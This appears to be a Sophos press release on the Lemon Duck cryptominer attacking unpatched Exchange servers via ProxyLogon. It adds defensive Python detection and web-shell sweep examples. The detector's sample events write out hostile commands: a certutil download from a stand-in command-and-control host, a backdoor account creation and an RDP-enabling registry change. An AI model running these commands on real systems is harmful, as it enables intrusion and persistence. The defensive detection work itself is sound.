The new technical features uncovered by Sophos researchers include:
- The abuse of certutil.exe, a Windows Certificate Services command line utility, to download malware that will help the Lemon Duck operators further exploit the targeted server and others on the same network, as well as the cryptocurrency-mining component. The downloaded modules and miner are then launched using PowerShell. In other versions of Lemon Duck, PowerShell is used to perform both the download and the execution.
- The mining payload is installed as a Windows Service – and the file is renamed as “Microsoft Defender Antivirus Network Inspection Service”
- The attackers create a user account and enable remote desktop access through RDP
- The malware code used to disable and remove security products has been updated with a new list of vendors
- A Cobalt Strike beacon is also delivered as part of this campaign and attempts to contact a command-and-control server
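The behaviours in the list above (certutil fetching from a URL, a service masquerading under the Defender Network Inspection Service name, a new local account, RDP being switched on) can each be turned into a simple detection rule. The following is an added example written for this page, not Sophos code: it runs four such rules over constructed sample events. The event dictionaries, their field names and all hostnames and paths are assumptions made for the example; only the Defender display name and the legitimate NisSrv.exe install directories are real.

```python
"""Detection rules for the Lemon Duck behaviours listed above, run over
constructed sample events (not real telemetry). The dict-per-event schema
and its field names are assumptions for this example."""
import re
from typing import Dict, List, Optional, Tuple

# Directories where the genuine Defender NIS binary (NisSrv.exe) lives.
DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)
NIS_DISPLAY_NAME = "Microsoft Defender Antivirus Network Inspection Service"
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events. Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f http://c2.invalid/stage.exe C:\Users\Public\stage.exe"},
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Temp\installer.msi SHA256"},  # benign use
    {"type": "service", "display_name": NIS_DISPLAY_NAME,
     "image_path": r"C:\Program Files\Windows Defender\NisSrv.exe"},      # genuine
    {"type": "service", "display_name": NIS_DISPLAY_NAME,
     "image_path": r"C:\Users\Public\svchost.exe"},                       # masquerade
    {"type": "process", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user remoteadm /add"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "value": "fDenyTSConnections", "data": 0},
]

Finding = Tuple[str, str]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_certutil_download(ev: Dict) -> Optional[Finding]:
    """certutil.exe invoked with a URL on its command line."""
    if ev.get("type") != "process" or _basename(ev.get("image", "")) != "certutil.exe":
        return None
    if URL_RE.search(ev.get("cmdline", "")):
        return ("certutil_download", ev["cmdline"])
    return None


def check_masqueraded_service(ev: Dict) -> Optional[Finding]:
    """Defender NIS display name, but the binary is outside Defender's directories."""
    if ev.get("type") != "service" or ev.get("display_name") != NIS_DISPLAY_NAME:
        return None
    path = ev.get("image_path", "").lower()
    if not any(path.startswith(d) for d in DEFENDER_DIRS):
        return ("masqueraded_defender_service", ev["image_path"])
    return None


def check_account_creation(ev: Dict) -> Optional[Finding]:
    """net.exe / net1.exe creating a local user."""
    if ev.get("type") != "process" or _basename(ev.get("image", "")) not in ("net.exe", "net1.exe"):
        return None
    tokens = ev.get("cmdline", "").lower().split()
    if "user" in tokens and "/add" in tokens:
        return ("local_account_created", ev["cmdline"])
    return None


def check_rdp_enabled(ev: Dict) -> Optional[Finding]:
    """fDenyTSConnections set to 0 under the Terminal Server key enables RDP."""
    if ev.get("type") != "registry":
        return None
    if (ev.get("value", "").lower() == "fdenytsconnections"
            and ev.get("data") == 0
            and "terminal server" in ev.get("key", "").lower()):
        return ("rdp_enabled", ev["key"])
    return None


RULES = [check_certutil_download, check_masqueraded_service,
         check_account_creation, check_rdp_enabled]


def detect(events: List[Dict]) -> List[Finding]:
    """Apply every rule to every event; return (rule_name, detail) hits in order."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for rule_name, detail in detect(SAMPLE_EVENTS):
        print(f"{rule_name}: {detail}")
```

The service rule keys on the mismatch between a trusted display name and an untrusted binary path, which is the reliable signal here; matching on the name alone would flag the genuine Defender service on every host.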
Please attribute the following quote to Rajesh Nataraj, senior threat researcher at Sophos:
“We recently noticed that the ProxyLogon exploit had been added into an updated version of Lemon Duck, an advanced cryptominer. This updated version was being used to target unpatched Microsoft Exchange servers with new features and functionality that allow the malware to establish a firm foothold in a compromised server and evade detection and removal by defenders. Most notably, this version of Lemon Duck allows an attacker to copy the web shells they use and hide them in a different location – boosting the likelihood of the shells remaining unseen so they can be used again.
“Web shells are pernicious. They provide attackers with a permanent backdoor into a victim’s web applications and related systems, with the ability to add commands of their choice, whenever they want to, directly onto the web server, without needing to log in first.
“Defenders should take urgent steps to install Microsoft’s patches to prevent exploitation of their Exchange Server. However, patching is not enough on its own – organizations need to determine and address their wider exposure so they don’t remain vulnerable to later attacks. For instance, admins should scan the Exchange server for web shells and monitor servers for any unusual processes that appear seemingly out of nowhere. High processor usage by an unfamiliar program could be a sign of cryptomining activity or ransomware. If this isn’t possible, closely monitor the server until you migrate the Exchange data to an updated server then disconnect the unpatched server from the internet.”
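The quote recommends scanning the Exchange server for web shells. One practical first pass is a sweep of the web root for server-side script files that were modified after a known-good baseline or that combine request input with a code-execution API. The example below is added for this page and is not Sophos tooling: it builds a small constructed directory tree (the paths, file names and content markers are assumptions, not Exchange's real layout) and runs the sweep over it.

```python
"""Added example: sweep a web root for unexpected server-side script files.
The sample tree, its paths and the marker strings are constructed for this
example and do not describe any real Exchange directory layout."""
import os
import tempfile
import time
from pathlib import Path
from typing import Dict, List

SCRIPT_EXTS = {".aspx", ".ashx", ".asmx", ".asp", ".php"}
# Markers that rarely co-occur in legitimate pages: request input
# flowing into a code- or process-execution API.
INPUT_MARKERS = ("request.form", "request.querystring", "request[")
EXEC_MARKERS = ("process.start", "eval(", "execute(")


def scan_web_root(root: str, baseline: float) -> List[Dict]:
    """Return script files modified after `baseline` (epoch seconds) and/or
    containing both an input marker and an execution marker."""
    findings: List[Dict] = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        reasons = []
        if path.stat().st_mtime > baseline:
            reasons.append("modified_after_baseline")
        text = path.read_text(errors="ignore").lower()
        if any(m in text for m in INPUT_MARKERS) and any(m in text for m in EXEC_MARKERS):
            reasons.append("input_reaches_exec")
        if reasons:
            findings.append({"path": str(path), "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree() -> str:
    """Constructed web root: one month-old benign page and one fresh page
    carrying both marker kinds (a comment only, so nothing executes)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    old_time = time.time() - 30 * 86400
    benign = Path(root, "wwwroot", "app", "logon.aspx")
    benign.parent.mkdir(parents=True)
    benign.write_text('<%@ Page Language="C#" %><p>Sign in</p>')
    os.utime(benign, (old_time, old_time))  # backdate to look like a shipped file
    fresh = Path(root, "wwwroot", "app", "new_page.aspx")
    fresh.write_text('<%@ Page Language="C#" %>'
                     '<% /* constructed marker: Request.Form ... Process.Start */ %>')
    return root


def baseline_for_last_week() -> float:
    """Baseline used here: anything changed in the last seven days is 'new'."""
    return time.time() - 7 * 86400


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for finding in scan_web_root(sample_root, baseline_for_last_week()):
        print(finding["path"], finding["reasons"])
```

On a real server the baseline would come from the last patch or deployment time, and a hit on either reason warrants a manual look rather than automatic deletion, since legitimate customisations can also trip the time check.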
Sophos Intercept X and Sophos Intercept X with EDR protect against threats attempting to exploit the ProxyLogon Exchange vulnerabilities.